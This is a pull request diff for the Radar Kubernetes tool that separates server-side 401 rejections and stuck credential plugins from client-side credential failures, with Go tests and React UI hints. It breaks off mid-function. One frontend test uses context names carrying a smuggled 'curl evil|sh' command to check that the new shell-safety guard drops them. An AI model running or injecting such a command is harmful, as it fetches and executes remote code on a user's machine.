### PR TITLE
Distinguish Kubernetes API 401s from credential acquisition failures

### DIFF
--- a/internal/app/bootstrap.go
+++ b/internal/app/bootstrap.go
@@ -525,7 +525,7 @@ func CheckClusterAccess(ctx context.Context) error {
 			// Exception: exec auth timeouts are retryable — the first call
 			// triggers a token refresh, and the cached token is ready by retry.
 			errType := k8s.ClassifyError(lastErr)
-			if errType == "config" || errType == "auth" || errType == "rbac" || errType == "network" || errType == "tls" {
+			if errType == "config" || errType == "auth" || errType == "auth-rejected" || errType == "rbac" || errType == "network" || errType == "tls" {
 				break
 			}
 			// Don't retry if the parent context is already done

--- a/internal/k8s/connection_state.go
+++ b/internal/k8s/connection_state.go
@@ -27,7 +27,7 @@ type ConnectionStatus struct {
 	Context     string          `json:"context"`
 	ClusterName string          `json:"clusterName,omitempty"`
 	Error       string          `json:"error,omitempty"`
-	ErrorType   string          `json:"errorType,omitempty"` // config, auth, rbac, network, timeout, tls, unknown
+	ErrorType   string          `json:"errorType,omitempty"` // config, auth, auth-rejected, auth-plugin-stuck, rbac, network, timeout, tls, unknown
 	ProgressMsg string          `json:"progressMessage,omitempty"`
 }
 
@@ -70,7 +70,7 @@ func SetConnectionStatus(status ConnectionStatus) {
 		runtimeAuthRecoveryOwed.Store(false)
 		resetInconclusiveStreak()
 	case StateDisconnected:
-		if strings.HasPrefix(status.ErrorType, "auth") {
+		if isAuthClassification(status.ErrorType) {
 			runtimeAuthRecoveryOwed.Store(true)
 		}
 		if runtimeAuthRecoveryOwed.Load() {
@@ -95,7 +95,7 @@ func notifyConnectionChange(status ConnectionStatus) {
 // MarkDisconnectedIfClusterUnreachable updates the shared connection state when
 // a live Kubernetes request proves that the current cluster endpoint is gone.
 func MarkDisconnectedIfClusterUnreachable(message string) bool {
-	if ClassifyError(errors.New(message)) == "auth" {
+	if isAuthClassification(ClassifyError(errors.New(message))) {
 		// Credential loss must go through the demotion pipeline — it confirms
 		// with a fresh probe, gates on endpoint reachability, and quiesces
 		// cluster-backed work. Publishing disconnected directly would skip
@@ -229,10 +229,11 @@ func isTransportTimeoutMessage(lower string) bool {
 	return false
 }
 
+// isAuthErrorMessage matches client-side credential acquisition failures (exec
+// plugins, SSO sessions) — no request reached the API server, and
+// re-authenticating locally is the fix.
 func isAuthErrorMessage(lower string) bool {
 	authMarkers := []string{
-		"unauthorized",
-		"authentication required",
 		"token has expired",
 		"expired token",
 		"sso session",
@@ -240,7 +241,6 @@ func isAuthErrorMessage(lower string) bool {
 		"ssoproviderinvalidtoken",
 		"aws sso login",
 		"getting credentials",
-		"provide credentials",
 		"credentials expired",
 		"credential plugin",
 		"exec credential",
@@ -261,6 +261,27 @@ func isAuthErrorMessage(lower string) bool {
 		"read empty token from file",
 	}
 	for _, marker := range authMarkers {
+		if strings.Contains(lower, marker) {
+			return true
+		}
+	}
+	return false
+}
+
+// isAuthRejectedMessage matches HTTP 401 responses: the request reached the API
+// server but could not be authenticated. Checked only after isAuthErrorMessage
+// so exec-plugin stderr that quotes a server error (e.g. "UnauthorizedException")
+// still classifies as client-side auth.
+func isAuthRejectedMessage(lower string) bool {
+	if strings.Contains(lower, "proxy authentication required") {
+		return false
+	}
+	rejectedMarkers := []string{
+		"unauthorized",
+		"authentication required",
+		"the server has asked for the client to provide credentials",
+	}
+	for _, marker := range rejectedMarkers {
 		if strings.Contains(lower, marker) {
 			return true
 		}
@@ -346,7 +367,7 @@ func ClassifyError(err error) string {
 		return "rbac"
 	}
 	if apierrors.IsUnauthorized(err) {
-		return "auth"
+		return "auth-rejected"
 	}
 	if apierrors.IsTimeout(err) || apierrors.IsServerTimeout(err) || errors.Is(err, context.DeadlineExceeded) {
 		return "timeout"
@@ -369,6 +390,9 @@ func ClassifyError(err error) string {
 	}
 	if isAuthErrorMessage(errLower) {
 		return "auth"
+	}
+	if isAuthRejectedMessage(errLower) {
+		return "auth-rejected"
 	}
 
 	if isTLSCertificateError(err) || isTLSCertificateMessage(errLower) {

--- a/internal/k8s/connection_state_test.go
+++ b/internal/k8s/connection_state_test.go
@@ -193,6 +193,36 @@ func TestClassifyError(t *testing.T) {
 			want: "auth",
 		},
 		{
+			name: "server 401 client-go phrasing is auth-rejected",
+			err:  "failed to connect to cluster: the server has asked for the client to provide credentials",
+			want: "auth-rejected",
+		},
+		{
+			name: "bare unauthorized is auth-rejected",
+			err:  "Unauthorized",
+			want: "auth-rejected",
+		},
+		{
+			name: "http 401 authentication required is auth-rejected",
+			err:  `the server responded with the status code 401 but did not return more information: Authentication required`,
+			want: "auth-rejected",
+		},
+		{
+			name: "exec failure quoting server unauthorized stays auth",
+			err:  "getting credentials: exec: executable aws failed with exit code 255: UnauthorizedException: invalid grant",
+			want: "auth",
+		},
+		{
+			name: "unrelated provide credentials text is not a server 401 fingerprint",
+			err:  "helper failed to provide credentials",
+			want: "unknown",
+		},
+		{
+			name: "proxy authentication required is not a Kubernetes 401",
+			err:  `Get "https://cluster.example/version": Proxy Authentication Required`,
+			want: "unknown",
+		},
+		{
 			name: "plain context deadline is timeout without exec auth",
 			err:  "failed to connect to cluster: context deadline exceeded",
 			want: "timeout",
@@ -333,9 +363,9 @@ func TestClassifyErrorTypedErrors(t *testing.T) {
 		want string
 	}{
 		{
-			name: "typed unauthorized is auth",
+			name: "typed unauthorized is auth-rejected",
 			err:  apierrors.NewUnauthorized("token expired"),
-			want: "auth",
+			want: "auth-rejected",
 		},
 		{
 			name: "typed forbidden is rbac",

--- a/internal/k8s/runtime_auth.go
+++ b/internal/k8s/runtime_auth.go
@@ -37,7 +37,11 @@ const (
 
 	// Published instead of the raw probe error, which broadcasts to every SSE
 	// client and can embed credential material on exec-plugin failure paths.
-	runtimeAuthLostMessage = "Kubernetes credentials for this context are no longer valid; re-authenticate to reconnect"
+	runtimeAuthLostMessage     = "Kubernetes credentials for this context are no longer valid; re-authenticate to reconnect"
+	runtimeAuthRejectedMessage = "The cluster could not authenticate this request (HTTP 401)"
+	// A wedged exec plugin gets its own auth-shaped type so recovery owns it
+	// without the UI suggesting that the credentials are known to be invalid.
+	runtimeAuthPluginStuckMessage = "The credential plugin for this context stopped responding; Kubernetes requests cannot be authenticated until it recovers"
 )
 
 var (
@@ -119,6 +123,11 @@ type runtimeAuthRoundTripper struct {
 	generation uint64
 }
 
+// isAuthClassification reports whether a classification is authentication-shaped.
+func isAuthClassification(classification string) bool {
+	return classification == "auth" || classification == "auth-rejected" || classification == "auth-plugin-stuck"
+}
+
 func (rt *runtimeAuthRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
 	resp, err := rt.next.RoundTrip(req)
 	// Two distinct shapes of credential loss: transport errors carry exec
@@ -126,11 +135,11 @@ func (rt *runtimeAuthRoundTripper) RoundTrip(req *http.Request) (*http.Response,
 	// while an expired-but-presentable token comes back as a plain 401
 	// response — at this layer it is not an error. 403 is deliberately not a
 	// candidate: RBAC denial is not credential loss.
-	if err != nil && ClassifyError(err) == "auth" {
+	if err != nil && isAuthClassification(ClassifyError(err)) {
 		reportRuntimeAuthFailure(rt.generation, err)
 	} else if resp != nil && resp.StatusCode == http.StatusUnauthorized {
-		// This synthetic message must keep classifying as "auth"
-		// (isAuthErrorMessage matches "unauthorized") or the report gate
+		// This synthetic message must keep classifying as auth-shaped
+		// (isAuthRejectedMessage matches "unauthorized") or the report gate
 		// below drops it silently.
 		reportRuntimeAuthFailure(rt.generation, errors.New("Kubernetes API returned HTTP 401 Unauthorized"))
 	}
@@ -138,7 +147,7 @@ func (rt *runtimeAuthRoundTripper) RoundTrip(req *http.Request) (*http.Response,
 }
 
 func reportRuntimeAuthFailure(generation uint64, candidate error) {
-	if candidate == nil || ClassifyError(candidate) != "auth" || !runtimeAuthCandidateIsCurrent(generation) {
+	if candidate == nil || !isAuthClassification(ClassifyError(candidate)) || !runtimeAuthCandidateIsCurrent(generation) {
 		return
 	}
 
@@ -185,7 +194,7 @@ func confirmRuntimeAuthFailure(generation, operationGeneration uint64) {
 	// plugin mutex.
 	hungPlugin := classification == "timeout" && err != nil && UsesExecAuth() &&
 		strings.Contains(err.Error(), "auth plugin timeout")
-	if classification != "auth" && !hungPlugin {
+	if !isAuthClassification(classification) && !hungPlugin {
 		setRuntimeAuthCooldown(generation, runtimeAuthCooldown(err), true)
 		if err == nil {
 			log.Printf("[k8s] Runtime authentication candidate dismissed for context %q: credentials accepted by a fresh probe",
@@ -230,7 +239,13 @@ func confirmRuntimeAuthFailure(generation, operationGeneration uint64) {
 	if !runtimeAuthStateIsCurrent(generation) || currentOperationGen() != operationGeneration {
 		return
 	}
-	if !transitionConnectedToRuntimeAuthFailure() {
+	// A hung plugin's classification is "timeout". Publish a distinct auth-shaped
+	// type so recovery ownership engages without showing generic re-auth guidance.
+	demotedType := classification
+	if hungPlugin {
+		demotedType = "auth-plugin-stuck"
+	}
+	if !transitionConnectedToRuntimeAuthFailure(demotedType) {
 		return
 	}
 	// Demotion is a conclusive outcome: the next episode's inconclusive
@@ -405,18 +420,27 @@ func defaultRuntimeAuthEndpointProbe(ctx context.Context, config *rest.Config) e
 	return nil
 }
 
-func transitionConnectedToRuntimeAuthFailure() bool {
+// The published Error stays fixed for each auth variant; raw probe errors can
+// embed credential material and this status broadcasts to every SSE client.
+func transitionConnectedToRuntimeAuthFailure(classification string) bool {
 	connectionStatusMu.Lock()
 	if connectionStatus.State != StateConnected {
 		connectionStatusMu.Unlock()
 		return false
 	}
+	message := runtimeAuthLostMessage
+	switch classification {
+	case "auth-plugin-stuck":
+		message = runtimeAuthPluginStuckMessage
+	case "auth-rejected":
+		message = runtimeAuthRejectedMessage
+	}
 	status := ConnectionStatus{
 		State:       StateDisconnected,
 		Context:     connectionStatus.Context,
 		ClusterName: connectionStatus.ClusterName,
-		Error:       runtimeAuthLostMessage,
-		ErrorType:   "auth",
+		Error:       message,
+		ErrorType:   classification,
 	}
 	connectionStatus = status
 	connectionStatusMu.Unlock()

--- a/internal/k8s/runtime_auth_recovery.go
+++ b/internal/k8s/runtime_auth_recovery.go
@@ -104,7 +104,7 @@ func runRuntimeAuthRecovery() {
 		ctx, cancel := context.WithTimeout(context.Background(), connectionTestOperationTimeout())
 		err := getRuntimeAuthProbe()(ctx)
 		cancel()
-		if err != nil && ClassifyError(err) == "auth" && runtimeAuthCredentialsAreStatic() {
+		if err != nil && isAuthClassification(ClassifyError(err)) && runtimeAuthCredentialsAreStatic() {
 			// Probing the in-memory config can never observe new INLINE
 			// credentials (token:/client-certificate-data: are read once at
 			// connect), but a full reconnect re-reads the kubeconfig from

--- a/internal/k8s/runtime_auth_test.go
+++ b/internal/k8s/runtime_auth_test.go
@@ -107,11 +107,11 @@ func TestRuntimeAuthRoundTripperReportsUnauthorizedResponse(t *testing.T) {
 		t.Fatalf("confirmation probes = %d, want 1", probes.Load())
 	}
 	status := GetConnectionStatus()
-	if status.State != StateDisconnected || status.ErrorType != "auth" {
-		t.Fatalf("connection status = %+v, want disconnected auth", status)
+	if status.State != StateDisconnected || status.ErrorType != "auth-rejected" {
+		t.Fatalf("connection status = %+v, want disconnected auth-rejected", status)
 	}
-	if status.Error != runtimeAuthLostMessage {
-		t.Fatalf("published error = %q, want the fixed credential-loss message (raw probe errors can embed credential material)", status.Error)
+	if status.Error != runtimeAuthRejectedMessage {
+		t.Fatalf("published error = %q, want the fixed identity-rejected message (raw probe errors can embed credential material)", status.Error)
 	}
 	if !runtimeAuthRecoveryOwed.Load() {
 		t.Fatal("demotion did not record the recovery debt")
@@ -683,8 +683,8 @@ func TestRuntimeAuthRecoveryRearmsThroughSwitchContext(t *testing.T) {
 	if probes.Load() != 1 {
 		t.Fatalf("recovered generation probes = %d, want 1", probes.Load())
 	}
-	if status := GetConnectionStatus(); status.State != StateDisconnected || status.ErrorType != "auth" {
-		t.Fatalf("connection status = %+v, want disconnected auth", status)
+	if status := GetConnectionStatus(); status.State != StateDisconnected || status.ErrorType != "auth-rejected" {
+		t.Fatalf("connection status = %+v, want disconnected auth-rejected", status)
 	}
 }
 
@@ -976,8 +976,14 @@ func TestRuntimeAuthHungExecPluginDemotesWhenEndpointReachable(t *testing.T) {
 	reportRuntimeAuthFailure(generation, errors.New("Kubernetes API returned HTTP 401 Unauthorized"))
 	waitForRuntimeAuthCheck(t, generation)
 
-	if status := GetConnectionStatus(); status.State != StateDisconnected || status.ErrorType != "auth" {
-		t.Fatalf("connection status = %+v, want disconnected auth (hung plugin with reachable endpoint)", status)
+	status := GetConnectionStatus()
+	if status.State != StateDisconnected || status.ErrorType != "auth-plugin-stuck" {
+		t.Fatalf("connection status = %+v, want disconnected auth-plugin-stuck (hung plugin with reachable endpoint)", status)
+	}
+	// The evidence is a wedged plugin, not a credential rejection — saying
+	// "credentials are no longer valid" would be a guess.
+	if status.Error != runtimeAuthPluginStuckMessage {
+		t.Fatalf("published error = %q, want the plugin-stuck message", status.Error)
 	}
 }
 
@@ -1042,6 +1048,48 @@ func TestInconclusiveStreakResetsOnConclusiveOutcomes(t *testing.T) {
 	}
 	if got := nextInconclusiveCooldown(); got != runtimeAuthInconclusiveProbeCooldown {
 		t.Fatalf("cooldown after demotion = %v, want %v", got, runtimeAuthInconclusiveProbeCooldown)
+	}
+}
+
+func TestRuntimeAuthDemotionPublishesClassificationSpecificCopy(t *testing.T) {
+	for _, tt := range []struct {
+		name        string
+		probeErr    error
+		wantType    string
+		wantMessage string
+	}{
+		{
+			name:        "client-side credential failure",
+			probeErr:    errors.New("getting credentials: exec: executable aws failed with exit code 255"),
+			wantType:    "auth",
+			wantMessage: runtimeAuthLostMessage,
+		},
+		{
+			name:        "server rejected the identity",
+			probeErr:    errors.New("the server has asked for the client to provide credentials"),
+			wantType:    "auth-rejected",
+			wantMessage: runtimeAuthRejectedMessage,
+		},
+	} {
+		t.Run(tt.name, func(t *testing.T) {
+			generation := prepareRuntimeAuthTest(t)
+			setRuntimeAuthProbe(func(context.Context) error { return tt.probeErr })
+
+			reportRuntimeAuthFailure(generation, errors.New("Kubernetes API returned HTTP 401 Unauthorized"))
+			waitForRuntimeAuthCheck(t, generation)
+
+			status := GetConnectionStatus()
+			if status.ErrorType != tt.wantType {
+				t.Fatalf("errorType = %q, want %q", status.ErrorType, tt.wantType)
+			}
+			if status.Error != tt.wantMessage {
+				t.Fatalf("published error = %q, want %q", status.Error, tt.wantMessage)
+			}
+			// Both variants are auth-shaped: recovery must own either one.
+			if !runtimeAuthRecoveryOwed.Load() {
+				t.Fatalf("%s did not record the recovery debt", tt.wantType)
+			}
+		})
 	}
 }
 
@@ -1160,20 +1208,24 @@ func TestRuntimeAuthRecoveryYieldsToActiveContextOperation(t *testing.T) {
 	}
 }
 
-func TestSetConnectionStatusStartsRecoveryForAuthPrefixedTypes(t *testing.T) {
-	ResetTestState()
-	t.Cleanup(ResetTestState)
-	setRuntimeAuthRecoveryIntervalsForTest(time.Hour, time.Hour)
+func TestSetConnectionStatusStartsRecoveryForAuthTypes(t *testing.T) {
+	for _, errorType := range []string{"auth", "auth-rejected", "auth-plugin-stuck"} {
+		t.Run(errorType, func(t *testing.T) {
+			ResetTestState()
+			t.Cleanup(ResetTestState)
+			setRuntimeAuthRecoveryIntervalsForTest(time.Hour, time.Hour)
 
-	SetConnectionStatus(ConnectionStatus{
-		State:     StateDisconnected,
-		Context:   "some-context",
-		ErrorType: "auth-rejected",
-	})
-	if !runtimeAuthRecoveryOwed.Load() {
-		t.Fatal("auth-prefixed disconnect did not record the recovery debt")
+			SetConnectionStatus(ConnectionStatus{
+				State:     StateDisconnected,
+				Context:   "some-context",
+				ErrorType: errorType,
+			})
+			if !runtimeAuthRecoveryOwed.Load() {
+				t.Fatalf("%s disconnect did not record the recovery debt", errorType)
+			}
+			waitForRecoveryWorker(t)
+		})
 	}
-	waitForRecoveryWorker(t)
 }
 
 func TestRuntimeAuthRecoveryStaticCredentialsReconnectViaDiskReread(t *testing.T) {
@@ -1218,31 +1270,43 @@ func TestRuntimeAuthRecoveryStaticCredentialsReconnectViaDiskReread(t *testing.T
 }
 
 func TestMarkDisconnectedAuthShapedMessageRoutesThroughDemotionPipeline(t *testing.T) {
-	generation := prepareRuntimeAuthTest(t)
-	var probes atomic.Int32
-	probeReturned := make(chan struct{}, 1)
-	setRuntimeAuthProbe(func(context.Context) error {
-		probes.Add(1)
-		select {
-		case probeReturned <- struct{}{}:
-		default:
-		}
-		return errors.New("dial tcp: connection refused")
-	})
+	for _, tt := range []struct {
+		name    string
+		message string
+	}{
+		{
+			name:    "client-side credential failure",
+			message: `failed to list helm releases: Kubernetes cluster unreachable: Get "https://cluster.test/version": getting credentials: exec: executable aws failed with exit code 255`,
+		},
+		{
+			name:    "server rejected authentication",
+			message: `failed to list helm releases: Kubernetes cluster unreachable: the server has asked for the client to provide credentials`,
+		},
+	} {
+		t.Run(tt.name, func(t *testing.T) {
+			generation := prepareRuntimeAuthTest(t)
+			probeReturned := make(chan struct{}, 1)
+			setRuntimeAuthProbe(func(context.Context) error {
+				select {
+				case probeReturned <- struct{}{}:
+				default:
+				}
+				return errors.New("dial tcp: connection refused")
+			})
 
-	marked := MarkDisconnectedIfClusterUnreachable(
-		`failed to list helm releases: Kubernetes cluster unreachable: Get "https://cluster.test/version": getting credentials: exec: executable aws failed with exit code 255`)
-	if marked {
-		t.Fatal("auth-shaped message must not mark disconnected directly — the pipeline decides")
-	}
-	select {
-	case <-probeReturned:
-	case <-time.After(2 * time.Second):
-		t.Fatal("auth-shaped message did not reach the demotion pipeline")
-	}
-	waitForRuntimeAuthCheck(t, generation)
-	if got := GetConnectionStatus().State; got != StateConnected {
-		t.Fatalf("state = %q, want %q (pipeline dismissed the candidate; no direct publish)", got, StateConnected)
+			if MarkDisconnectedIfClusterUnreachable(tt.message) {
+				t.Fatal("auth-shaped message must not mark disconnected directly — the pipeline decides")
+			}
+			select {
+			case <-probeReturned:
+			case <-time.After(2 * time.Second):
+				t.Fatal("auth-shaped message did not reach the demotion pipeline")
+			}
+			waitForRuntimeAuthCheck(t, generation)
+			if got := GetConnectionStatus().State; got != StateConnected {
+				t.Fatalf("state = %q, want %q (pipeline dismissed the candidate; no direct publish)", got, StateConnected)
+			}
+		})
 	}
 }
 

--- a/internal/mcp/errors.go
+++ b/internal/mcp/errors.go
@@ -3,7 +3,6 @@ package mcp
 import (
 	"errors"
 	"fmt"
-	"strings"
 
 	"github.com/skyhook-io/radar/internal/k8s"
 )
@@ -15,7 +14,12 @@ import (
 func errNotConnected() error {
 	status := k8s.GetConnectionStatus()
 	if status.State == k8s.StateDisconnected && status.Error != "" {
-		if strings.HasPrefix(status.ErrorType, "auth") {
+		switch status.ErrorType {
+		case "auth-rejected":
+			return fmt.Errorf("not connected to cluster: %s. The Kubernetes API returned HTTP 401, so check that the local credential source supplied a current credential and, where identities are mapped explicitly, that the principal has a cluster mapping (on EKS, an access entry or legacy aws-auth mapping). Radar reconnects automatically once authentication succeeds; POST /api/connection/retry forces an immediate check", status.Error)
+		case "auth-plugin-stuck":
+			return fmt.Errorf("not connected to cluster: %s. Check that the kubeconfig credential command and its identity-provider or network dependencies are responsive. Radar continues checking in the background; POST /api/connection/retry forces an immediate check", status.Error)
+		case "auth":
 			return fmt.Errorf("not connected to cluster: %s. Radar re-checks in the background and reconnects automatically once credentials are refreshed; POST /api/connection/retry forces an immediate check", status.Error)
 		}
 		return fmt.Errorf("not connected to cluster: %s", status.Error)

--- a/web/src/components/ConnectionErrorView.test.tsx
+++ b/web/src/components/ConnectionErrorView.test.tsx
@@ -1,0 +1,88 @@
+import { renderToStaticMarkup } from 'react-dom/server'
+import type { ReactNode } from 'react'
+import { describe, expect, it, vi } from 'vitest'
+
+vi.stubGlobal('window', { location: { host: 'localhost:9280' } })
+
+vi.mock('@skyhook-io/k8s-ui', () => ({
+  ClusterName: ({ name }: { name: string }) => <span>{name}</span>,
+  useOpenLocalTerminal: () => vi.fn(),
+}))
+vi.mock('../api/client', () => ({
+  useAuthMe: () => ({ data: { authEnabled: false } }),
+}))
+vi.mock('./ContextSwitcher', () => ({
+  ContextSwitcher: () => <button>Switch context</button>,
+}))
+vi.mock('./ui/Tooltip', () => ({
+  Tooltip: ({ children }: { children: ReactNode }) => children,
+}))
+
+import {
+  ConnectionErrorView,
+  CopyableCommand,
+  getAuthRejectedHints,
+  selectConnectionHints,
+} from './ConnectionErrorView'
+
+function renderError(errorType: string, context: string): string {
+  return renderToStaticMarkup(
+    <ConnectionErrorView
+      connection={{ state: 'disconnected', context, errorType, error: 'safe error' }}
+      onRetry={() => {}}
+      isRetrying={false}
+    />,
+  )
+}
+
+describe('ConnectionErrorView authentication guidance', () => {
+  it('builds an honest EKS diagnostic without presenting it as authentication', () => {
+    const context = 'arn:aws:eks:us-east-1:123456789012:cluster/prod'
+    const hints = getAuthRejectedHints(context)
+    const markup = renderError('auth-rejected', context)
+
+    expect(hints.authCommand?.command).toBe(
+      'aws sts get-caller-identity && aws eks describe-cluster --name prod --region us-east-1 --query cluster.accessConfig.authenticationMode --output text',
+    )
+    expect(hints.hideAuthButton).toBe(true)
+    expect(markup).toContain('EKS Could Not Authenticate This Request')
+    expect(markup).not.toContain('Authenticate in terminal')
+  })
+
+  it('does not offer interpolated commands for hostile EKS context values', () => {
+    const hints = getAuthRejectedHints('arn:aws:eks:us-east-1;curl evil|sh:123456789012:cluster/prod')
+
+    expect(hints.authCommand).toBeUndefined()
+    expect(hints.hideAuthButton).toBeUndefined()
+    expect(hints.fallbackCommand?.command).toBe('aws sso login')
+  })
+
+  it('does not offer interpolated commands for hostile GKE context values', () => {
+    const hints = getAuthRejectedHints('gke_project_us-east1_prod;curl evil|sh')
+
+    expect(hints.authCommand?.command).toBe('gcloud auth login')
+    expect(hints.fallbackCommand).toBeUndefined()
+  })
+
+  it('selects dedicated guidance for a stuck credential plugin', () => {
+    expect(selectConnectionHints('auth-plugin-stuck', 'eks-context')?.title).toBe('Credential Plugin Stopped Responding')
+
+    const markup = renderError('auth-plugin-stuck', 'eks-context')
+    expect(markup).toContain('Credential Plugin Stopped Responding')
+    expect(markup).not.toContain('aws sso login')
+  })
+
+  it('renders placeholder AKS commands without a run affordance', () => {
+    const markup = renderError('auth-rejected', 'clusterUser_platform_prod')
+
+    expect(markup.match(/aria-label="Run command in terminal"/g)).toHaveLength(1)
+    expect(markup).toContain('&lt;cluster&gt;')
+    expect(markup).toContain('&lt;rg&gt;')
+  })
+
+  it('renders copy-only commands without a run affordance', () => {
+    const markup = renderToStaticMarkup(<CopyableCommand command="placeholder" />)
+
+    expect(markup).not.toContain('aria-label="Run command in terminal"')
+  })
+})

--- a/web/src/components/ConnectionErrorView.tsx
+++ b/web/src/components/ConnectionErrorView.tsx
@@ -6,6 +6,7 @@ import { parseContextName } from '../utils/context-name'
 import { useOpenLocalTerminal, ClusterName } from '@skyhook-io/k8s-ui'
 import { useAuthMe } from '../api/client'
 import { Tooltip } from './ui/Tooltip'
+import { allShellSafe } from '../utils/shell-safe'
 
 interface ConnectionErrorViewProps {
   connection: ConnectionState
@@ -13,13 +14,21 @@ interface ConnectionErrorViewProps {
   isRetrying: boolean
 }
 
+interface CommandHint {
+  label: string
+  command: string
+  runnable?: boolean
+}
+
 interface AuthHints {
   title: string
   hints: string[]
   /** Primary auth command — usually sufficient on its own */
-  authCommand?: { label: string; command: string }
+  authCommand?: CommandHint
   /** Secondary command shown as fallback if primary doesn't resolve the issue */
-  fallbackCommand?: { label: string; command: string }
+  fallbackCommand?: CommandHint
+  /** Set when authCommand is a diagnostic rather than a re-auth — suppresses the "Authenticate in terminal" button */
+  hideAuthButton?: boolean
 }
 
 function getAuthHints(context: string): AuthHints {
@@ -32,7 +41,7 @@ function getAuthHints(context: string): AuthHints {
         hints: ['Radar could not get Google Cloud credentials for this context.'],
         authCommand: { label: 'Refresh Google Cloud credentials:', command: 'gcloud auth login' },
       }
-      if (parsed.region && parsed.account) {
+      if (parsed.region && parsed.account && allShellSafe(parsed.clusterName, parsed.region, parsed.account)) {
         const isZone = /^[a-z]+-[a-z]+\d+-[a-z]$/.test(parsed.region)
         const flag = isZone ? '--zone' : '--region'
         result.fallbackCommand = {
@@ -51,7 +60,7 @@ function getAuthHints(context: string): AuthHints {
         ],
         authCommand: { label: 'If this context uses AWS SSO, refresh credentials:', command: 'aws sso login' },
       }
-      if (parsed.region) {
+      if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
           label: 'If that doesn\'t work, refresh cluster credentials:',
           command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}`,
@@ -64,7 +73,7 @@ function getAuthHints(context: string): AuthHints {
         title: 'AKS Authentication Failed',
         hints: ['Radar could not get Azure credentials for this context.'],
         authCommand: { label: 'Refresh Azure credentials:', command: 'az login' },
-        fallbackCommand: { label: 'If that doesn\'t work, refresh cluster credentials:', command: 'az aks get-credentials --name <cluster> --resource-group <rg>' },
+        fallbackCommand: { label: 'If that doesn\'t work, refresh cluster credentials:', command: 'az aks get-credentials --name <cluster> --resource-group <rg>', runnable: false },
       }
     default:
       return {
@@ -74,6 +83,85 @@ function getAuthHints(context: string): AuthHints {
           'Re-authenticate with your cloud provider and try again',
         ],
       }
+  }
+}
+
+export function getAuthRejectedHints(context: string): AuthHints {
+  const parsed = parseContextName(context)
+
+  switch (parsed.provider) {
+    case 'EKS': {
+      const result: AuthHints = {
+        title: 'EKS Could Not Authenticate This Request',
+        hints: [
+          'EKS returned HTTP 401, so Kubernetes could not authenticate this request.',
+          'The AWS credential may be missing, stale, or revoked, or its IAM principal may not be mapped through an EKS access entry or the cluster\'s legacy aws-auth configuration.',
+          'If the credential is current, ask a cluster admin to verify the mapping for the IAM principal used by this context.',
+          'The diagnostic uses the terminal\'s current AWS profile. If the kubeconfig exec block pins AWS_PROFILE or --role-arn, use that profile or role instead.',
+          'API and API_AND_CONFIG_MAP modes use access entries; CONFIG_MAP mode uses the aws-auth ConfigMap.',
+        ],
+        fallbackCommand: { label: 'If this context uses the current AWS SSO profile, re-login and retry:', command: 'aws sso login' },
+      }
+      if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
+        result.authCommand = {
+          label: 'Inspect the caller and authentication mode for the current terminal AWS profile:',
+          command: `aws sts get-caller-identity && aws eks describe-cluster --name ${parsed.clusterName} --region ${parsed.region} --query cluster.accessConfig.authenticationMode --output text`,
+        }
+        // A diagnostic, not a re-auth — the "Authenticate in terminal" button
+        // would misrepresent what running it does.
+        result.hideAuthButton = true
+      }
+      return result
+    }
+    case 'GKE': {
+      const result: AuthHints = {
+        title: 'GKE Could Not Authenticate This Request',
+        hints: [
+          'GKE returned HTTP 401, so Kubernetes could not authenticate this request.',
+          'The credential or auth plugin may be missing or misconfigured, or the OAuth token may be stale or revoked.',
+        ],
+        authCommand: { label: 'Refresh Google Cloud credentials:', command: 'gcloud auth login' },
+      }
+      if (parsed.region && parsed.account && allShellSafe(parsed.clusterName, parsed.region, parsed.account)) {
+        const isZone = /^[a-z]+-[a-z]+\d+-[a-z]$/.test(parsed.region)
+        const flag = isZone ? '--zone' : '--region'
+        result.fallbackCommand = {
+          label: 'If that doesn\'t work, refresh cluster credentials:',
+          command: `gcloud container clusters get-credentials ${parsed.clusterName} ${flag} ${parsed.region} --project ${parsed.account}`,
+        }
+      }
+      return result
+    }
+    case 'AKS':
+      return {
+        title: 'AKS Could Not Authenticate This Request',
+        hints: [
+          'AKS returned HTTP 401, so Kubernetes could not authenticate this request.',
+          'The credential may be missing, stale, or revoked — re-authenticating usually resolves this.',
+        ],
+        authCommand: { label: 'Refresh Azure credentials:', command: 'az login' },
+        fallbackCommand: { label: 'If that doesn\'t work, refresh cluster credentials:', command: 'az aks get-credentials --name <cluster> --resource-group <rg>', runnable: false },
+      }
+    default:
+      return {
+        title: 'Kubernetes Could Not Authenticate This Request',
+        hints: [
+          'The Kubernetes API returned HTTP 401, so it could not authenticate this request.',
+          'The kubeconfig user may not have supplied a credential, or its credential may be expired or revoked.',
+          'If the cluster maps identities explicitly, the principal used by this context may not be mapped yet.',
+        ],
+      }
+  }
+}
+
+function getAuthPluginStuckHints(): AuthHints {
+  return {
+    title: 'Credential Plugin Stopped Responding',
+    hints: [
+      'The credential command configured by this kubeconfig did not return before the deadline.',
+      'Check that your cloud-provider CLI and its identity-provider or network dependencies are responsive.',
+      'Radar will keep checking in the background and reconnect when the credential command recovers.',
+    ],
   }
 }
 
@@ -91,7 +179,7 @@ function getTimeoutHints(context: string): AuthHints | null {
         hints: [...baseHints, 'If the endpoint is reachable, Google Cloud credentials may need refresh.'],
         authCommand: { label: 'If network access looks healthy, refresh Google Cloud credentials:', command: 'gcloud auth login' },
       }
-      if (parsed.region && parsed.account) {
+      if (parsed.region && parsed.account && allShellSafe(parsed.clusterName, parsed.region, parsed.account)) {
         const isZone = /^[a-z]+-[a-z]+\d+-[a-z]$/.test(parsed.region)
         const flag = isZone ? '--zone' : '--region'
         result.fallbackCommand = {
@@ -107,7 +195,7 @@ function getTimeoutHints(context: string): AuthHints | null {
         hints: [...baseHints, 'If the endpoint is reachable, AWS credentials or SSO may need refresh.'],
         authCommand: { label: 'If this context uses AWS SSO and network access looks healthy, refresh credentials:', command: 'aws sso login' },
       }
-      if (parsed.region) {
+      if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
           label: 'If that does not work, refresh cluster credentials:',
           command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}`,
@@ -120,7 +208,7 @@ function getTimeoutHints(context: string): AuthHints | null {
         title: 'Connection Timed Out',
         hints: [...baseHints, 'If the endpoint is reachable, Azure credentials may need refresh.'],
         authCommand: { label: 'If network access looks healthy, refresh Azure credentials:', command: 'az login' },
